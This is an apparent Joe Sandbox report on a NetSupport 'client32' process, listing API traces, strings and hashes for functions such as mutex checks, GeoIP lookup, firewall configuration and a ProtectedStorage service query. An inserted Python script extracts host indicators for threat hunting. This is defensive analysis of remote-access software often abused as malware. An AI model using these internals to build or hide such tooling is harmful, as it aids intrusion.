• String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,24DE4E77,02626E50,02626E40,?,00000000,1117ED9C,000000FF,?,11031392,02626E50,00000000,?,?,?), ref: 11084F85
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
  • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
• GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
• GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
• GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
• wsprintfA.USER32 ref: 1108505B
• wsprintfA.USER32 ref: 11085072
• wsprintfA.USER32 ref: 11085089
• CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
  • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084BD8
  • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084BEB
  • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084BFE
  • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11085200,?,11031392,02626E50,00000000,?,?,?), ref: 11084C11
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
• String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
• API String ID: 3281479988-2492245516
• Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
• Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
• Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
• Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
APIs
• OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
• CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
• GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
• SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
• WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
• CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
• FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
• CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: the same fifteen client32 dump files listed for the first entry above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
• String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
• API String ID: 2061479752-1320826866
• Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
• Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
• Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
• Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
  • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
• wsprintfA.USER32 ref: 11027E84
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
• GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
• wsprintfA.USER32 ref: 11027F01
• CloseHandle.KERNEL32(?), ref: 11027F17
• CloseHandle.KERNEL32(?), ref: 11027F20
• LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: the same fifteen client32 dump files listed for the first entry above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
• String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
• API String ID: 512045693-1744591295
• Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
• Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
• Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
• Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
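The three entries above (the PCIINV.DLL inventory loader, the PCIMutex / policy-key startup routine, and the SetClientResLang routine that runs GetUserLang.exe and then loads pcicl32_res.dll) all use the same report layout: an "APIs" list of `Api.MODULE(args), ref: address` lines and a "String ID" line with the function's literals joined by `$`. The Python below is an added example, not part of the Joe Sandbox report and not NetSupport code: it parses that layout into records, converts each `ref:` call-site address to an RVA using the 11000000 image base from the Memory Dump Source lines, and pulls out the string indicators a hunter would carry into a rule. `SAMPLE` is a constructed, trimmed excerpt of the entries on this page. The argument positions it relies on (lpName is the third parameter of OpenMutexA/CreateMutexA, the procedure name is the second of GetProcAddress) come from the Win32 prototypes, not from the report; anything listed after a prototype's real parameters is a stack slot the sandbox printed, which is why CreateMutexA shows eight "arguments".

```python
"""Parse Joe Sandbox function entries ('APIs' lists and 'String ID' lines as
rendered on this page) into records and extract host indicators.
Added example, not Joe Sandbox tooling; the layout assumptions are taken
only from the entries shown on this page."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

# Constructed excerpt: trimmed copies of three entries from the client32 dump.
SAMPLE = r"""APIs
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
• GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
• wsprintfA.USER32 ref: 1108505B
• CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
Similarity
• String ID: %s_HF.%s$%s_HW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
APIs
• OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
• CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
• GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
Similarity
• String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
• LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
Similarity
• String ID: "$Locales\%d\$\GetUserLang.exe"$pcicl32_res.dll
• Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
"""

IMAGE_BASE = 0x11000000  # "Offset: 11000000" in the Memory Dump Source lines

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, Api.MODULE,
# optional (args), then "ref: <call-site address>". Hex is upper-case in the report.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
_HEX = re.compile(r"^[0-9A-F]{8}$")
MUTEX_APIS = {"OpenMutexA", "OpenMutexW", "CreateMutexA", "CreateMutexW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]   # printed stack window; only the prototype's first N are real parameters
    ref: str          # call-site VA as printed
    sub: str | None   # callee function the call lives in, when listed as a subcall


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    instruction_id: str = ""


def rva(ref: str, base: int = IMAGE_BASE) -> int:
    """Turn a printed call-site address into an RVA for the dumped client32 image."""
    return int(ref, 16) - base


def parse_entries(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    current: FunctionEntry | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every function entry opens with this header
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            current.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                         m.group("ref"), m.group("sub")))
        elif line.startswith("• String ID:"):   # literals of the function, joined with '$'
            current.strings = line.split(":", 1)[1].strip().split("$")
        elif line.startswith("• Instruction ID:"):
            current.instruction_id = line.split(":", 1)[1].strip()
    return entries


def is_literal(arg: str) -> bool:
    """True when the sandbox resolved the slot to a string rather than a raw value."""
    return arg != "?" and not _HEX.match(arg)


def extract_iocs(entries: list[FunctionEntry]) -> dict[str, list[str]]:
    iocs: dict[str, set[str]] = {k: set() for k in ("mutex", "registry", "module", "export", "exe")}
    for entry in entries:
        for call in entry.calls:
            if call.api in MUTEX_APIS and len(call.args) >= 3 and is_literal(call.args[2]):
                iocs["mutex"].add(call.args[2])      # lpName is the third parameter
            if call.api == "GetProcAddress" and len(call.args) >= 2 and is_literal(call.args[1]):
                iocs["export"].add(call.args[1])     # resolved by name, not by ordinal
            for arg in call.args:
                if arg.upper().startswith("SOFTWARE\\"):
                    iocs["registry"].add(arg)
        for s in entry.strings:
            low = s.lower()
            if low.endswith(".dll"):
                iocs["module"].add(s.lstrip("\\"))
            elif low.rstrip('"').endswith(".exe"):
                iocs["exe"].add(s.strip('"').lstrip("\\"))
            elif low.startswith("software\\"):
                iocs["registry"].add(s)
    return {k: sorted(v) for k, v in iocs.items()}


if __name__ == "__main__":
    print(json.dumps(extract_iocs(parse_entries(SAMPLE)), indent=2))
```

The extracted strings identify the NetSupport client itself (its mutex, its Group Policy key, its inventory and resource DLLs), so on a host where NetSupport Manager is deployed legitimately they are attribution, not proof of compromise; use them together with how the client arrived and from where it runs. The RVAs from `rva()` are what to feed IDA or Ghidra after loading the 11001000 dump at base 11000000 to land on the exact call sites the report cites.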
APIs
  • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
• GetTickCount.KERNEL32 ref: 1102C09A
  • Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A
• GetTickCount.KERNEL32 ref: 1102C194
  • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
  • Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
• CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
• String ID: ?IP=%s$@r$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
• API String ID: 596640303-3071264536
• Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
• Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
• Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
• Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
APIs
• RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
  • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
  • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
• RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
• RegCloseKey.ADVAPI32(?), ref: 11060E21
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Enum$Open$CloseValue
• String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
• API String ID: 2823542970-1528906934
• Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
• Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
• Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
• Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
APIs
  • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
• GetTickCount.KERNEL32 ref: 11134B22
  • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
  • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
  • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
  • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
• GetTickCount.KERNEL32 ref: 11134B31
• _memset.LIBCMT ref: 11134B73
• GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
• _strrchr.LIBCMT ref: 11134B98
• _free.LIBCMT ref: 11134BEA
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
• String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
• API String ID: 711243594-1270230032
• Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
• Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
• Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
• Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
APIs
• ioctlsocket.WSOCK32 ref: 68597642
• connect.WSOCK32(00000000,?,?), ref: 68597659
• WSAGetLastError.WSOCK32(00000000,?,?), ref: 68597660
• _memmove.LIBCMT ref: 685976D3
• select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 685976F3
• GetTickCount.KERNEL32 ref: 68597717
• ioctlsocket.WSOCK32 ref: 6859775C
• SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68597762
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6859777A
                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6859778B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                                                                                                    • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                                                                                    • API String ID: 4218156244-2969206566
                                                                                                                                                                                                    • Opcode ID: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
                                                                                                                                                                                                    • Instruction ID: 30e65d9f3c13ca9ba06203294eaad4451362e010f8f7e2b579c452b5405bcc0f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1441EB759403149BEB20DF64CC48BEEB3BAEF84305F8044AAE90997181EB705E58CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                      • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                      • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                      • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,02610820,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                                                    • API String ID: 1594747848-1114959992
                                                                                                                                                                                                    • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,24DE4E77), ref: 1102CA84
                                                                                                                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
